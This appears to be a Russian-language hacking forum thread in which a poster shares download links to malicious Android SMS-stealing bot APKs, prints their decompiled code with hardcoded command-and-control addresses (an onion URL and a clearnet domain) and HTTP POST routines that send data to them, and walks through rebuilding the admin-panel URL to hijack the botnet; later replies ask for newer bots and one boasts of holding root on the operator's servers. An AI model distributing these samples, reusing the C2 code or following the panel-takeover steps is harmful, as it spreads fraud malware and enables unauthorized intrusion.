Угоняем исходники Android бота.

Discussion in 'Video.Antichat' started by e17, 4 Mar 2014.

  1. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    57
    Reputations:
    81
    Небольшее видео о гениальности разработчика Android бота, решившего сделать админ панель, способную самостоятельно компилировать билд.

    Вообще, создатели подобного ПО часто грешат, оставляя уязмимости подобного характера, например открытые конфиги к БД.

    [​IMG]

    смотреть:http://video.yandex.ru/users/doe-joe2015/view/2/
    cкачать:http://www.sendspace.com/file/m5apmn

    Тема представлена в виде небольшого квеста.
     
    #1 e17, 4 Mar 2014
    Last edited by a moderator: 7 Mar 2014
    to.Index, Forte, VY_CMa and 5 others like this.
  2. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    57
    Reputations:
    81
    Оставлю еще пару ботов на слив, рассмотрим варианты поиска админ панели, бот представляет из себя .apk фаил который с легкостью открывается android SDK.

    Вариант простой:
    https://www.dropbox.com/s/6yud3jxcdv1etxh/2e6dbfa85186af23a598694d2667207a254f8979.apk
    Code:
    public class Constants
     
    {
      public static final String ADMIN_URL = "http://yuwurw46taaep6ip.onion/";
      public static final String CLIENT_NUMBER = "1";
      public static final String CONTROL_NUMBER = "CONTROL_NUMBER";
      public static final String DEBUG_TAG = "DEBUGGING";
      public static final String INTERCEPTING_INCOMING_ENABLED = "INTERCEPTING_INCOMING_ENABLED";
      public static final String LISTENING_SMS_ENABLED = "LISTENING_SMS_ENABLED";
      public static final String MAKING_USSD = "MAKING_USSD";
      public static final String PREFS_NAME = "AppPrefs";
    }
    
    Собираем линк посимвольно:

    https://www.dropbox.com/s/427gzbwpalch2de/video.apk
    Code:
    BasicHttpParams localBasicHttpParams = new BasicHttpParams();
          HttpProtocolParams.setVersion(localBasicHttpParams, HttpVersion.HTTP_1_1);
          HttpProtocolParams.setContentCharset(localBasicHttpParams, "UTF-8");
          SchemeRegistry localSchemeRegistry = new SchemeRegistry();
          localSchemeRegistry.register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
          localSchemeRegistry.register(new Scheme("https", localh, 443));
          DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient(new ThreadSafeClientConnManager(localBasicHttpParams, localSchemeRegistry), localBasicHttpParams);
          while (true)
          {
            try
            {
              HttpPost localHttpPost = new HttpPost("https://" + j.h + "/" + j.i + "/set/" + str2 + "/");
              ArrayList localArrayList = new ArrayList();
              localArrayList.add(new BasicNameValuePair("type", paramArrayOfString[0]));
              localArrayList.add(new BasicNameValuePair("json", paramArrayOfString[1]));
              localHttpPost.setEntity(new UrlEncodedFormEntity(localArrayList, "UTF-8"));
              HttpEntity localHttpEntity = localDefaultHttpClient.execute(localHttpPost).getEntity();
              if (localHttpEntity != null)
              {
                str1 = EntityUtils.toString(localHttpEntity);
                Log.i("Result", str1);
                return str1;
              }
            }
    
    Разбор АП :
    Code:
     
    public class j
    {
      public static boolean a = false;
      public static boolean b = false;
      public static String c = "";
      public static boolean d = false;
      public static String e = "";
      public static long f = 0L;
      public static String g = "";
      public static String h = "robinguda.net";
      public static String i = "marry4";
      public static String j = "5110";
      public static boolean k = false;
      public static Context l;
      public static String m = "";
      public static boolean n = false;
      public static String o = "";
      public static boolean p = true;
      public static ArrayList q = new ArrayList();
      public static String r = "";
      public static boolean s = false;
      public static boolean t = false;
      public static boolean u = false;
    
    Собираем урлу по схеме, :https://robinguda.net/marry4//set/
    гуглбот индексация :

    https://robinguda.ne...30308043088489/ ::

    {'type':task, 'task':["sms","030308043088489","900","BALANS","2014-03-14T20:31:37+04:00","24954652bd05517d41144bebe20cf57d1b43c52e"]}
     
    #2 e17, 12 May 2014
    Last edited: 12 May 2014
    to.Index likes this.
  3. nikbim96

    nikbim96 Member

    Joined:
    16 Jan 2014
    Messages:
    112
    Likes Received:
    22
    Reputations:
    1
    Хрень все linki битые.... обнови linki.
     
  4. Skittless

    Skittless New Member

    Joined:
    3 Sep 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    спасибо
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Есть какой нить бот по актуальней?
     
  6. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    У меня на 2 компе где то до сих пор лежат руты от его сервантов.Там меньше 100 ботов уже.